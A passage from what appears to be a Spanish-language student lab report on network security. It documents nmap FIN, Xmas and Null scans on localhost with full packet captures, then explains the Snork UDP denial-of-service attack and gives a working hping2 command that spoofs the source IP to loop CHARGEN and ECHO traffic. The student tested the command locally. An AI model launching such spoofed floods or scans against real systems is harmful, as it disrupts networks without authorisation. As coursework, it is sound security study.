Host Knoppix (127.0.0.1) appears to be up ... good. Initiating FIN Scan against Knoppix (127.0.0.1) The FIN Scan took 12 seconds to scan 1 ports. Adding open port 80/tcp Interesting ports on Knoppix (127.0.0.1): Port State Service 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 12.026 seconds root@ttyp1[knoppix]# nmap -sF -P0 -v -p 90 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating FIN Scan against Knoppix (127.0.0.1) The FIN Scan took 0 seconds to scan 1 ports. The 1 scanned port on Knoppix (127.0.0.1) is: closed Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

La captura que ha hecho el sniffer de Ethereal con ambos comandos fue la siguiente:
Frame 1 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:48:58.528267000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds Frame Number: 1 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x007f Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 48 Protocol: TCP (0x06) Header checksum: 0x8c4f (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 49913 (49913), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 49913 (49913) Destination port: www (80) Sequence number: 0 Header length: 20 bytes Flags: 0x0001 (FIN)

16 de 32

0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 1024 Checksum: 0xea97 (correct) Frame 2 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:49:04.532414000 Time delta from previous packet: 6.004147000 seconds Time relative to first packet: 6.004147000 seconds Frame Number: 2 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x444f Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 48 Protocol: TCP (0x06) Header checksum: 0x487f (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 49914 (49914), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 49914 (49914) Destination port: www (80) Sequence number: 0 Header length: 20 bytes Flags: 0x0001 (FIN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 1024 Checksum: 0xea96 (correct)

17 de 32

Frame 3 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:49:20.106023000 Time delta from previous packet: 15.573609000 seconds Time relative to first packet: 21.577756000 seconds Frame Number: 3 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x9e6a Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 55 Protocol: TCP (0x06) Header checksum: 0xe763 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 35109 (35109), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0 Source port: 35109 (35109) Destination port: 90 (90) Sequence number: 0 Header length: 20 bytes Flags: 0x0001 (FIN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 4096 Checksum: 0x1862 (correct) Frame 4 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:49:20.106048000 Time delta from previous packet: 0.000025000 seconds Time relative to first packet: 21.577781000 seconds Frame Number: 4 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800)

18 de 32

Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 90 (90), Dst Port: 35109 (35109), Seq: 0, Ack: 1, Len: 0 Source port: 90 (90) Destination port: 35109 (35109) Sequence number: 0 Acknowledgement number: 1 Header length: 20 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0 Checksum: 0x284e (correct)

Como podemos ver el Ethereal ha capturados cuatro frames: En el frame 1 el nmap (desde el puerto 49913) lanza una peticin de FIN sobre el puerto 80 de http. En el frame 2 es el nmap de nuevo, por medio del puerto 49914 el que manda otro flag de FIN al puerto de http 80. El nmap comprueba que el puerto 80 est activo y en servicio al comprobar que no ha recibido ningn flag de RST en respuesta a sus peticiones de FIN por parte del puerto 80 de http. En el frame 3 vemos que el nmap, por medio del puerto 35109 manda un flag de FIN al puerto 90. En el frame 4 es el puerto 90 el que manda los flags de RST y ACK al puerto 35109 del nmap para terminar con el intento de conexin. En este momento el nmap se da cuenta de que el puerto 90 est cerrado (inactivo y sin ningn servicio funcionando).

19 de 32

4) TCP Xmas Tree Scan

Los comandos de nmap que usamos fueron los siguientes:
root@ttyp1[knoppix]# nmap -sX -P0 -v -p 80 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating XMAS Scan against Knoppix (127.0.0.1) The XMAS Scan took 12 seconds to scan 1 ports. Adding open port 80/tcp Interesting ports on Knoppix (127.0.0.1): Port State Service 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 12.030 seconds root@ttyp1[knoppix]# nmap -sX -P0 -v -p 90 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating XMAS Scan against Knoppix (127.0.0.1) The XMAS Scan took 0 seconds to scan 1 ports. The 1 scanned port on Knoppix (127.0.0.1) is: closed Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

La captura que ha hecho el sniffer de Ethereal con ambos comandos fue la siguiente:
Frame 1 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:52:06.423370000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds Frame Number: 1 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x4170 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 56

20 de 32

Protocol: TCP (0x06) Header checksum: 0x435e (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 49513 (49513), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 49513 (49513) Destination port: www (80) Sequence number: 0 Header length: 20 bytes Flags: 0x0029 (FIN, PSH, URG) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..1. .... = Urgent: Set ...0 .... = Acknowledgment: Not set .... 1... = Push: Set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 1024 Checksum: 0xebff (correct) Urgent pointer: 0 Frame 2 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:52:12.432586000 Time delta from previous packet: 6.009216000 seconds Time relative to first packet: 6.009216000 seconds Frame Number: 2 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0xa178 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 56 Protocol: TCP (0x06) Header checksum: 0xe355 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 49514 (49514), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 49514 (49514) Destination port: www (80) Sequence number: 0 Header length: 20 bytes

21 de 32

Flags: 0x0029 (FIN, PSH, URG) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..1. .... = Urgent: Set ...0 .... = Acknowledgment: Not set .... 1... = Push: Set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 1024 Checksum: 0xebfe (correct) Urgent pointer: 0 Frame 3 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:52:28.497773000 Time delta from previous packet: 16.065187000 seconds Time relative to first packet: 22.074403000 seconds Frame Number: 3 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x3349 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 45 Protocol: TCP (0x06) Header checksum: 0x5c85 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 60229 (60229), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0 Source port: 60229 (60229) Destination port: 90 (90) Sequence number: 0 Header length: 20 bytes Flags: 0x0029 (FIN, PSH, URG) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..1. .... = Urgent: Set ...0 .... = Acknowledgment: Not set .... 1... = Push: Set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...1 = Fin: Set Window size: 2048

22 de 32

Checksum: 0xbe19 (correct) Urgent pointer: 0 Frame 4 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:52:28.497798000 Time delta from previous packet: 0.000025000 seconds Time relative to first packet: 22.074428000 seconds Frame Number: 4 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 90 (90), Dst Port: 60229 (60229), Seq: 0, Ack: 1, Len: 0 Source port: 90 (90) Destination port: 60229 (60229) Sequence number: 0 Acknowledgement number: 1 Header length: 20 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0 Checksum: 0xc62d (correct)

Como podemos ver el Ethereal ha capturados cuatro frames: En el frame 1 el nmap (desde el puerto 49513) lanza una peticin con los flags FIN, PSH, URG sobre el puerto 80 de http. En el frame 2 es el nmap de nuevo, por medio del puerto 49514 el que manda otra peticin con los flags de FIN, PSH, URG al puerto de http 80. 23 de 32

El nmap comprueba que el puerto 80 est activo y en servicio al comprobar que no ha recibido ningn flag de RST en respuesta a sus peticiones por parte del puerto 80 de http. En el frame 3 vemos que el nmap, por medio del puerto 60229 manda una peticin con los flags de FIN, PSH, URG al puerto 90. En el frame 4 es el puerto 90 el que manda los flags de RST y ACK al puerto 60229 del nmap para terminar con el intento de conexin. En este momento el nmap se da cuenta de que el puerto 90 est cerrado (inactivo y sin ningn servicio funcionando).

5) TCP Null Scan

Los comandos de nmap que usamos fueron los siguientes:
root@ttyp1[knoppix]# nmap -sN -P0 -v -p 80 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating NULL Scan against Knoppix (127.0.0.1) The NULL Scan took 12 seconds to scan 1 ports. Adding open port 80/tcp Interesting ports on Knoppix (127.0.0.1): Port State Service 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 12.024 seconds root@ttyp1[knoppix]# nmap -sN -P0 -v -p 90 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating NULL Scan against Knoppix (127.0.0.1) The NULL Scan took 0 seconds to scan 1 ports. The 1 scanned port on Knoppix (127.0.0.1) is: closed Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

La captura que ha hecho el sniffer de Ethereal con ambos comandos fue la siguiente:
Frame 1 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:56:10.849565000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds Frame Number: 1 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes

24 de 32

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0xb5b3 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 54 Protocol: TCP (0x06) Header checksum: 0xd11a (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 42382 (42382), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 42382 (42382) Destination port: www (80) Sequence number: 0 Header length: 20 bytes Flags: 0x0000 () 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 3072 Checksum: 0x0004 (correct) Frame 2 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:56:16.852470000 Time delta from previous packet: 6.002905000 seconds Time relative to first packet: 6.002905000 seconds Frame Number: 2 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0xe56a Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0

25 de 32

Time to live: 54 Protocol: TCP (0x06) Header checksum: 0xa163 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 42383 (42383), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0 Source port: 42383 (42383) Destination port: www (80) Sequence number: 0 Header length: 20 bytes Flags: 0x0000 () 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 3072 Checksum: 0x0003 (correct) Frame 3 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:56:41.368966000 Time delta from previous packet: 24.516496000 seconds Time relative to first packet: 30.519401000 seconds Frame Number: 3 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0xd292 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 37 Protocol: TCP (0x06) Header checksum: 0xc53b (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 60898 (60898), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0 Source port: 60898 (60898) Destination port: 90 (90) Sequence number: 0 Header length: 20 bytes

26 de 32

Flags: 0x0000 () 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 2048 Checksum: 0xbba5 (correct) Frame 4 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:56:41.368992000 Time delta from previous packet: 0.000026000 seconds Time relative to first packet: 30.519427000 seconds Frame Number: 4 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 90 (90), Dst Port: 60898 (60898), Seq: 0, Ack: 0, Len: 0 Source port: 90 (90) Destination port: 60898 (60898) Sequence number: 0 Acknowledgement number: 0 Header length: 20 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0

27 de 32

Checksum: 0xc391 (correct)

Como podemos ver el Ethereal ha capturados cuatro frames: En el frame 1 el nmap (desde el puerto 42382) lanza una peticin sin flags al puerto 80 de http. En el frame 2 es el nmap de nuevo, por medio del puerto 42383 el que manda otra peticin sin flags al puerto de http 80. El nmap comprueba que el puerto 80 est activo y en servicio al comprobar que no ha recibido ningn flag de RST en respuesta a sus peticiones por parte del puerto 80 de http. En el frame 3 vemos que el nmap, por medio del puerto 60898 manda una peticin sin flags al puerto 90. En el frame 4 es el puerto 90 el que manda una peticin TCP con los flags RST y ACK al puerto 60898 del nmap para terminar con el intento de conexin. En este momento el nmap se da cuenta de que el puerto 90 est cerrado (inactivo y sin ningn servicio funcionando).

Ejercicio 3: El ataque Snork

Suponed que estamos usando una mquina que se halla en una LAN con la direccin de red 10.30.0.0/16. Usando Nmap, nos hemos percatado de que hay una mquina con IP 10.30.15.15 donde est funcionando el servicio UDP/ECHO y otra con IP 10.30.30.30 donde est funcionando el servicio UDP/CHARGEN.

1) Indicad los comandos Nmap que habrais utilizado para explorar los servicios UDP de las mquinas 10.30.15.15 y 10.30.30.30.
Los comandos nmap que hubiramos usado seran los siguientes:
root@ttyp0[knoppix]# nmap -sU -v 10.30.15.15 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) WARNING: Could not determine what interface to route packets through to 10.30.15.15, changing ping scantype to ICMP ping only pcap_open_live: bind: No such device There are several possible reasons for this, depending on your operating system: LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled. *BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod). SOLARIS: If you are trying to scan localhost and getting '/dev/lo0: No such file or directory', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-P0 -sT localhost" though.

28 de 32

QUITTING! root@ttyp0[knoppix]# nmap -sU -v 10.30.30.30 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) WARNING: Could not determine what interface to route packets through to 10.30.30.30, changing ping scantype to ICMP ping only pcap_open_live: bind: No such device There are several possible reasons for this, depending on your operating system: LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled. *BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod). SOLARIS: If you are trying to scan localhost and getting '/dev/lo0: No such file or directory', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-P0 -sT localhost" though. QUITTING! root@ttyp0[knoppix]#

Como es lgico ambos comandos nos devuelven un error porque al lanzar el nmap desde nuestra mquina no encuentra las IP's: 10.30.15.15 y 10.30.30.30. Si probamos el mismo comando contra la IP 127.0.0.1 vemos que el nmap ya no nos da error sino que nos da un resultado coherente:
root@ttyp0[knoppix]# nmap -sU -v 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating UDP Scan against Knoppix (127.0.0.1) The UDP Scan took 1 second to scan 1468 ports. All 1468 scanned ports on Knoppix (127.0.0.1) are: closed Nmap run completed -- 1 IP address (1 host up) scanned in 1.911 seconds

Parece que en esta IP no tenemos ningn puerto UDP abierto.

2) Explicad en qu consiste el ataque de DoS Snork.

Como la mayora de protocolos, IP define un sistema de pruebas simple que permite verificar el funcionamiento del protocolo de comunicacin. El sistema proporcionado se basa en enviar un datagrama especial al ordenador destino, que lo reconoce y enva una respuesta al origen (ECHO REPLY). El protocolo IP define para estas pruebas un servicio para la recepcin de un datagrama UDP al puerto 7 (ECHO). Por otro lado, existe un servicio proporcionado en muchos sistemas operativos tipo UNIX denominado CHARGEN (CHARacter GENerator, generador de caracteres) que dada una peticin responde con una secuencia aleatoria de caracteres. Este servicio se encuentra disponible escuchando en el puerto 19 a datagramas UDP. En sistemas Windows NT se suele utilizar el puerto 135 (Microsoft Locator Service) para el ataque snork.

29 de 32

El ataque consiste en cruzar ambos servicios enviando una peticin falsa al servicio CHARGEN (que retorna una secuencia de caracteres pseudo-aleatoria) falseando la direccin de origen dando como puerto de respuesta el puerto ECHO (que responde a cualquier peticin) de la mquina a atacar. De esta forma, se inicia un juego de pingpong infinito. Este ataque puede realizarse entre varios ordenadores (consumiendo ancho de banda y degradando el rendimiento de la red) o desde un mismo ordenador (l mismo se enva una peticin y responde) consiguiendo consumir los recursos existentes (especialmente CPU y memoria) de la mquina atacada.

3) Explicad por qu las dos mquinas exploradas son vulnerables a este ataque.
Estas mquinas son vulnerables porque la mquina trampoln (la 10.30.15.15) tiene habilitado el puerto de ECHO (puerto 7 UDP) y la mquina vctima (la 10.30.30.30) tiene habilitado el puerto de CHARGEN (puerto 19 UDP) con lo cual enviando una peticin adecuada a ambos puertos y modificando las IP's de origen y de destino de la peticin (esta es una debilidad del protocolo IP que no detecta ni controla estos cambios ilegales en las direcciones de origen y destino de las peticiones -> no las comprueba y el protocolo las admite si tienen el formato adecuado) puede crear un lazo infinito de peticiones y respuestas entre un par de mquinas o en una sola siempre que estn disponibles y en servicio los puertos UDP necesarios. 4) Explicad los parmetros con los que llamarais el comando hping2 a vuestra mquina para enviar un paquete UDP que genere el bucle infinito entre 10.30.15.15 y 10.30.30.30. Despus de leer la documentacin del comando en http://www.hping.org/manpage.html y en el man del knoppix he llegado a la conclusin de que un posible comando vlido sera:
root@ttyp1[knoppix]# hping2 --udp --baseport 19 --destport 7 --keep -a 10.30.30.30 10.30.15.15 Warning: Unable to guess the output interface HPING 10.30.15.15 (lo 10.30.15.15): udp mode set, 28 headers + 0 data bytes [send_ip] sendto: Network is unreachable

El comando nos da un error porque no encuentra la IP de destino 10.30.15.15 al hacer la peticin desde mi ordenador local. En el comando especificamos que la peticin es de tipo UDP (---udp), el puerto base, de origen es el 19 (--baseport 19), el puerto de destino es el 7 (--destport), la direccin IP de origen falseada para que sea la de la vctima (-a 10.30.30.30) y la IP de destino falseada para que sea la de la mquina trampoln (10.30.15.15). El parmetro keep sirve para que el valor de los puertos origen y destino no se vayan incrementando y no varen. Nota: Probando este comando en un knoppix 3.7, en la misma mquina, con la IP 127.0.0.1, tomando esta IP como la IP de la mquina trampoln y la IP de la mquina vctima, con el comando de hping2:

30 de 32

hping2 --udp --baseport 19 --destport 7 --keep -a 127.0.0.1 127.0.0.1

y descomentando en el fichero /ect/inetd.conf las entradas de los puertos udp de CHARGEN y ECHO (porque por defecto estos puertos estn cerrados para prevenir este tipo de ataques), he podido comprobar que se produca el bucle y el porcentaje de CPU asignado a este proceso aumentaba hasta el mximo posible hasta que cortaba la ejecucin del comando.

Ejercicio 4: El ataque Smurf

1) Explicad en qu consiste el ataque Smurf.
